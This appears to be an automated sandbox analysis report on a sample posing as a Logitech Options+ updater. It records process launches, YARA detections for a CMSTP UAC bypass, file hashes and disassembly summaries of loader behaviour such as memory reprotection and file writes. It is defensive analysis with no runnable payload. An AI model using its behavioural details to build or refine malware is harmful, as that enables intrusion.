                                                                                                      Path:C:\Windows\SysWOW64\more.com
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\more.com
                                                                                                      Imagebase:0xe30000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:16:42:26
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:16:43:18
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:16:43:21
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:16:43:22
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\more.com
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\more.com
                                                                                                      Imagebase:0xe30000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:16:43:22
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:16:43:25
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0xa20000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:16:44:17
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0xa20000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:32.8%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:5.4%
                                                                                                        Total number of Nodes:147
                                                                                                        Total number of Limit Nodes:7
                                                                                                        execution_graph 1270 79aa18 1276 79a968 1270->1276 1271 798622 GlobalAlloc 1271->1276 1272 79aaa3 1274 7984d2 GlobalAlloc 1272->1274 1275 79aaad 1272->1275 1279 79aafc 1272->1279 1273 7982d2 GlobalAlloc 1273->1272 1274->1279 1276->1271 1277 79aa12 1276->1277 1278 799e42 4 API calls 1276->1278 1277->1272 1277->1273 1278->1276 1279->1275 1280 799902 GlobalAlloc 1279->1280 1281 79aba9 1280->1281 1282 798e72 2 API calls 1281->1282 1283 79abe0 1282->1283 1284 799902 GlobalAlloc 1283->1284 1285 79ac1d 1284->1285 1286 79ac3a VirtualProtect 1285->1286 1287 7991f2 1286->1287 1288 79ac77 VirtualProtect 1287->1288 1288->1275 1128 79ace2 1131 79a082 1128->1131 1132 79a0eb 1131->1132 1188 799032 1132->1188 1134 79a120 1135 799032 GetPEB 1134->1135 1136 79a137 1135->1136 1191 799902 1136->1191 1138 79a3af 1194 798b52 1138->1194 1140 79a3cc 1197 798e72 1140->1197 1142 79a3e9 1143 799902 GlobalAlloc 1142->1143 1144 79a4f1 1143->1144 1201 798ae2 1144->1201 1146 79a50e 1147 798e72 2 API calls 1146->1147 1148 79a521 1147->1148 1204 799962 1148->1204 1150 79a599 1211 798bd2 1150->1211 1152 79a675 1214 799242 CreateFileW 1152->1214 1154 79a697 1220 799b62 1154->1220 1156 79a6d7 1157 79a791 1156->1157 1158 79a7e5 1156->1158 1224 799d12 1157->1224 1160 79a81d 1158->1160 1161 79a7ed 1158->1161 1162 799902 GlobalAlloc 1160->1162 1230 798ce2 1161->1230 1166 79a82a 1162->1166 1163 79a7dd 1167 79aaad 1163->1167 1170 79aafc 1163->1170 1253 7984d2 1163->1253 1168 799902 GlobalAlloc 1166->1168 1169 79a8a8 1168->1169 1234 798c22 1169->1234 1170->1167 1171 799902 GlobalAlloc 1170->1171 1173 79aba9 1171->1173 1175 798e72 2 API calls 1173->1175 1174 79a8fa 1177 799902 GlobalAlloc 1174->1177 1180 79aa12 1174->1180 1176 79abe0 1175->1176 1179 799902 GlobalAlloc 1176->1179 1186 79a955 1177->1186 1181 79ac1d 1179->1181 1180->1163 1249 7982d2 1180->1249 1182 79ac3a VirtualProtect 1181->1182 1228 7991f2 1182->1228 1186->1180 1239 798622 1186->1239 1242 799e42 1186->1242 1256 79a032 GetPEB 1188->1256 1190 799052 1190->1134 1192 79991e GlobalAlloc 1191->1192 1193 799912 1191->1193 1192->1138 1193->1192 1195 799902 GlobalAlloc 1194->1195 1196 798b61 1195->1196 1196->1140 1198 799902 GlobalAlloc 1197->1198 1199 798e83 1198->1199 1200 798e96 LoadLibraryW 1199->1200 1200->1142 1202 799902 GlobalAlloc 1201->1202 1203 798af1 1202->1203 1203->1146 1206 799977 1204->1206 1205 799902 GlobalAlloc 1205->1206 1206->1205 1207 7999af NtQuerySystemInformation 1206->1207 1210 79999d 1206->1210 1207->1206 1208 7999db 1207->1208 1209 799902 GlobalAlloc 1208->1209 1209->1210 1210->1150 1212 799902 GlobalAlloc 1211->1212 1213 798be0 1212->1213 1213->1152 1215 79926f 1214->1215 1216 799276 1214->1216 1215->1154 1216->1215 1217 799902 GlobalAlloc 1216->1217 1218 7992b2 ReadFile 1217->1218 1218->1215 1219 7992ed CloseHandle 1218->1219 1219->1215 1221 799b73 1220->1221 1222 798e72 2 API calls 1221->1222 1223 799c48 1222->1223 1223->1156 1225 799d35 1224->1225 1226 799e42 4 API calls 1225->1226 1227 799dca 1225->1227 1226->1225 1227->1163 1229 7991fe VirtualProtect 1228->1229 1229->1167 1232 798d05 1230->1232 1231 798d53 1231->1163 1232->1231 1233 7982d2 GlobalAlloc 1232->1233 1233->1232 1235 799902 GlobalAlloc 1234->1235 1236 798c33 1235->1236 1237 799902 GlobalAlloc 1236->1237 1238 798c55 1237->1238 1238->1174 1257 798872 1239->1257 1241 798667 1241->1186 1243 798c22 GlobalAlloc 1242->1243 1244 799e51 1243->1244 1263 799832 CreateFileW 1244->1263 1248 799e76 1248->1186 1250 7982fc 1249->1250 1252 798303 1249->1252 1250->1163 1251 799902 GlobalAlloc 1251->1252 1252->1250 1252->1251 1254 799902 GlobalAlloc 1253->1254 1255 7984e5 1254->1255 1255->1170 1256->1190 1258 798881 1257->1258 1259 799902 GlobalAlloc 1258->1259 1262 79888d 1258->1262 1260 798978 1259->1260 1261 799902 GlobalAlloc 1260->1261 1261->1262 1262->1241 1264 799863 WriteFile 1263->1264 1265 79985f 1263->1265 1264->1265 1265->1248 1266 79ae92 1265->1266 1267 79aea3 1266->1267 1268 79af36 malloc 1267->1268 1269 79aee2 1267->1269 1268->1269 1269->1248 1289 798d92 1294 7985e2 1289->1294 1291 798daa 1292 799242 4 API calls 1291->1292 1293 798dd2 1292->1293 1295 799902 GlobalAlloc 1294->1295 1296 7985f0 1295->1296 1296->1291 1297 7982c6 1298 7982fc 1297->1298 1300 798303 1297->1300 1299 799902 GlobalAlloc 1299->1300 1300->1298 1300->1299

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_0079B47F 1 Function_0079B773 2 Function_0079BB73 3 Function_0079A072 4 Function_00799372 5 Function_00798872 50 Function_00799902 5->50 59 Function_007991F2 5->59 84 Function_007991C2 5->84 6 Function_00798E72 21 Function_00799442 6->21 6->50 7 Function_0079B777 8 Function_0079BB77 9 Function_0079BB6B 10 Function_0079B76B 11 Function_0079B76F 12 Function_0079BB6F 13 Function_00799B62 13->4 13->6 56 Function_00798EF2 13->56 14 Function_00799F62 80 Function_0079ADC2 14->80 15 Function_00799962 15->4 32 Function_00799732 15->32 15->50 97 Function_00798FB2 15->97 16 Function_0079AD62 17 Function_0079D267 18 Function_0079A052 19 Function_0079B552 20 Function_00798B52 49 Function_00799312 20->49 20->50 58 Function_007993F2 20->58 20->59 21->84 22 Function_00799942 23 Function_00799242 23->50 24 Function_00799E42 24->22 35 Function_00799832 24->35 44 Function_00798C22 24->44 102 Function_0079AE92 24->102 25 Function_00799342 103 Function_00799792 25->103 106 Function_00799192 25->106 26 Function_00798542 27 Function_0079B142 42 Function_0079B122 27->42 27->106 28 Function_00799142 72 Function_007994D2 28->72 29 Function_0079B638 30 Function_0079B73B 31 Function_00799F3D 32->84 104 Function_00799492 32->104 33 Function_00799032 34 Function_0079A032 33->34 64 Function_007990E2 33->64 36 Function_0079B42A 37 Function_0079B62E 38 Function_00799B22 39 Function_00799022 40 Function_0079AE22 41 Function_0079B222 43 Function_00798622 43->5 43->58 44->50 53 Function_00799502 44->53 95 Function_007985B2 44->95 45 Function_0079B626 46 Function_0079AA18 46->6 46->18 46->24 46->43 46->50 54 Function_00798A02 46->54 57 Function_007989F2 46->57 46->58 46->59 61 Function_00798DE2 46->61 62 Function_007997E2 46->62 76 Function_007982D2 46->76 77 Function_007984D2 46->77 83 Function_007996C2 46->83 96 Function_00798EB2 46->96 46->106 47 Function_00799D12 47->4 47->24 47->38 47->59 93 Function_00799EB2 47->93 48 Function_00799612 91 Function_007993B2 49->91 49->106 51 Function_0079AD02 52 Function_00799702 52->21 52->84 54->84 55 Function_0079B5FA 56->18 56->27 58->106 60 Function_0079BCEB 61->27 63 Function_0079ACE2 108 Function_0079A082 63->108 64->104 65 Function_00798CE2 65->59 65->76 65->93 66 Function_00798AE2 66->49 66->50 66->58 66->59 67 Function_007985E2 67->50 82 Function_007995C2 67->82 68 Function_007989E2 69 Function_0079B6E5 70 Function_007987D0 71 Function_00798CD2 73 Function_00798BD2 73->50 73->62 74 Function_0079B0D2 74->74 75 Function_00799AD2 75->74 76->26 76->50 76->59 76->93 94 Function_0079B1B2 76->94 77->50 81 Function_0079B3C2 77->81 78 Function_007989D2 79 Function_00799AC8 80->16 81->4 81->41 81->59 83->4 85 Function_00798BC2 86 Function_0079B5C4 87 Function_0079D2C7 88 Function_0079D4C7 89 Function_007982C6 89->26 89->50 89->59 89->93 89->94 90 Function_0079B6B1 92 Function_007998B2 92->84 95->4 97->42 97->84 98 Function_0079B5A8 99 Function_0079B4AA 100 Function_0079BCA3 101 Function_0079B6A6 102->4 102->14 102->51 103->106 105 Function_00798D92 105->23 105->53 105->67 107 Function_0079B681 108->6 108->13 108->15 108->18 108->20 108->23 108->24 108->33 108->43 108->44 108->47 108->50 108->54 108->56 108->57 108->58 108->59 108->61 108->62 108->65 108->66 108->68 108->73 108->75 108->76 108->77 108->83 108->96 108->97 108->106

                                                                                                        Executed Functions

                                                                                                        Function 00799962 Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 217 799962-799970 218 799977-79997e 217->218 219 799ac9-799acd 218->219 220 799984-79999b call 799902 218->220 223 79999d 220->223 224 7999a2-7999cf call 799372 NtQuerySystemInformation 220->224 223->219 227 7999db-7999f8 call 799902 224->227 228 7999d1-7999d9 224->228 231 7999fb-799a01 227->231 228->218 232 799ac2 231->232 233 799a07-799a0e 231->233 232->219 234 799ab2-799abd 233->234 235 799a14-799a34 call 799372 233->235 234->231 238 799a3f-799a45 235->238 239 799a6b-799a97 call 799732 call 798fb2 238->239 240 799a47-799a53 238->240 247 799a99-799a9f 239->247 248 799aa1-799aaa 239->248 240->239 241 799a55-799a69 240->241 241->238 247->234 248->234 249 799aac-799aaf 248->249 249->234
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 007999C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobalInformationQuerySystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 3737350999-0
                                                                                                        • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                        • Instruction ID: 17be851d84b3f7a5c65864a0c895b1990679072fa59c6b656abe613cab6b1359
                                                                                                        • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                        • Instruction Fuzzy Hash: 4451EA75D00109EFDF04CF99D881AAEB7B5FF98300F14855DEA15AB341D739AA81CBA1
                                                                                                        Function 00799242 Relevance: 4.6, APIs: 3, Instructions: 79fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00799264
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                        • Instruction ID: c6b77d4765c7e81c40f338dd798c5b803052c3c1a569cdf75fd2d2e5f22701c5
                                                                                                        • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                        • Instruction Fuzzy Hash: 6631AC75A00108FFDF44DF98D891F9EB7B9AF88310F208198EA19AB391D675AE41DB50
                                                                                                        Function 0079A082 Relevance: 4.0, APIs: 2, Instructions: 995memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 13 79a082-79a5a2 call 799ad2 call 799032 * 2 call 798ef2 * 18 call 799902 call 798b52 call 798e72 call 798ef2 * 8 call 799902 call 798ae2 call 798e72 call 798ef2 * 3 call 799962 93 79a5d2-79a718 call 798ef2 * 3 call 798bd2 call 799242 call 798ef2 call 799b62 13->93 94 79a5a4-79a5ab 13->94 115 79a71a-79a71e 93->115 116 79a720-79a72b 93->116 95 79a5b6-79a5ba 94->95 95->93 96 79a5bc-79a5d0 call 7996c2 95->96 96->95 117 79a731-79a78f 115->117 116->117 118 79a72d 116->118 119 79a791-79a7d8 call 799d12 117->119 120 79a7e5-79a7eb 117->120 118->117 125 79a7dd-79a7e0 119->125 122 79a81d-79a858 call 799902 call 7991f2 120->122 123 79a7ed-79a818 call 798ce2 120->123 136 79a862-79a868 122->136 128 79aab2-79aac6 123->128 125->128 131 79aac8-79ab04 call 7984d2 128->131 132 79ab0d-79ab19 128->132 141 79ab0b 131->141 142 79ab06 131->142 135 79ab1c-79ab3f call 799192 132->135 146 79ab41-79ab4a 135->146 147 79ab50-79accc call 798de2 call 799902 call 7993f2 call 7997e2 call 798e72 call 79a052 call 799902 call 7991f2 VirtualProtect call 7991f2 VirtualProtect 135->147 139 79a86a-79a895 136->139 140 79a897-79a8ae call 799902 136->140 139->136 150 79a8b5-79a8c0 140->150 141->135 144 79acd6-79acd9 142->144 146->147 199 79acd3 147->199 153 79a8e1-79a944 call 798c22 call 798fb2 call 7989e2 150->153 154 79a8c2-79a8df 150->154 167 79a94a-79a95e call 799902 153->167 168 79aa82-79aa88 153->168 154->150 177 79a968-79a96f 167->177 168->128 172 79aa8a-79aaab call 7982d2 168->172 172->128 179 79aaad 172->179 180 79aa5c-79aa7f call 7989f2 177->180 181 79a975-79a99c call 798a02 177->181 179->144 180->168 189 79a9be-79a9e3 call 798622 181->189 190 79a99e-79a9bc call 7996c2 181->190 197 79a9e5 189->197 198 79a9e7-79a9f2 189->198 190->177 197->177 200 79a9f4-79aa10 call 798eb2 198->200 201 79aa57 198->201 199->144 204 79aa1a-79aa53 call 799e42 200->204 205 79aa12-79aa16 200->205 201->177 204->201 208 79aa55 204->208 205->180 208->180 208->201
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                          • Part of subcall function 00798E72: LoadLibraryW.KERNELBASE(?), ref: 00798EA3
                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0079AC57
                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0079AC8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 2510009449-0
                                                                                                        • Opcode ID: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                        • Instruction ID: 1bf1e792e26c291694053c6d5d3df2dec411f76455052249a06058b48134e11d
                                                                                                        • Opcode Fuzzy Hash: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                        • Instruction Fuzzy Hash: 8492D5B5E00218EFCB54DF98D991EAEB7B5BF88300F248199E509A7341E735AE41CF91
                                                                                                        Function 00799832 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 209 799832-79985d CreateFileW 210 79985f-799861 209->210 211 799863-799886 WriteFile 209->211 212 7998a6-7998a9 210->212 213 799898-7998a4 211->213 214 799888-799896 211->214 213->212 214->212
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00799854
                                                                                                        • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 00799882
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 2263783195-0
                                                                                                        • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                        • Instruction ID: 455c035d9e8ffe5e4584b81bd9c1c3b8f54db6c7cb81aaa7735b809c045b11f7
                                                                                                        • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                        • Instruction Fuzzy Hash: 18010075640108FBDB10DE99DD81F9EB3B9AF89714F20C159FA189B291D631EE02DB90
                                                                                                        Function 00798E72 Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 250 798e72-798eae call 799902 call 799442 LoadLibraryW
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00798EA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobalLibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 3361179946-0
                                                                                                        • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                        • Instruction ID: 64032cd6c8b0e020cdd1c27ec6039522d1b8c79b76d13af45cfa8f308a4c98e8
                                                                                                        • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                        • Instruction Fuzzy Hash: F6E0EDB5E00208FBCB40EFA8DD8299E7BB8AF58211F508198F90897341E635EA118B91
                                                                                                        Function 0079AE92 Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 255 79ae92-79aee0 call 799372 260 79aee9-79af21 255->260 261 79aee2-79aee4 255->261 265 79af23-79af31 260->265 266 79af36-79af62 malloc 260->266 262 79b0c5-79b0c8 261->262 265->262 267 79af6d-79af73 266->267 269 79aff3-79aff7 267->269 270 79af75-79af7c 267->270 271 79aff9-79b016 269->271 272 79b01b-79b032 call 799f62 269->272 273 79af87-79af8d 270->273 271->262 280 79b053-79b07f 272->280 281 79b034-79b051 272->281 275 79af8f-79afa9 273->275 276 79afee 273->276 282 79afae-79afec call 79ad02 275->282 276->267 285 79b08a-79b092 280->285 281->262 282->273 286 79b094-79b0b5 285->286 287 79b0b7-79b0be 285->287 286->285 292 79b0c3 287->292 292->262
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                        • Instruction ID: b26e80b44b30d117393629bb3d3fbcca84a942a999038a519fb3e1ae9ba7d236
                                                                                                        • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                        • Instruction Fuzzy Hash: F791D7B5D04209EFCF08CF98D881AEEBBB6BF88300F108158E515AB351D735AA45CFA1
                                                                                                        Function 00799902 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 317 799902-799910 318 79991e-799937 GlobalAlloc 317->318 319 799912-79991b 317->319 319->318
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 3761449716-0
                                                                                                        • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                        • Instruction ID: 5a233fd34c04cdac1d28563dd86f1bc3a58f75e7caf54104958144e638a175d2
                                                                                                        • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                        • Instruction Fuzzy Hash: BDF0A578604208EFCB44CF98D480959B7B5FB8C320F10C299FC188B301C630EE81CB94

                                                                                                        Non-executed Functions

                                                                                                        Function 0079A032 Relevance: .0, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                        • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                                        • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                        • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.1%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
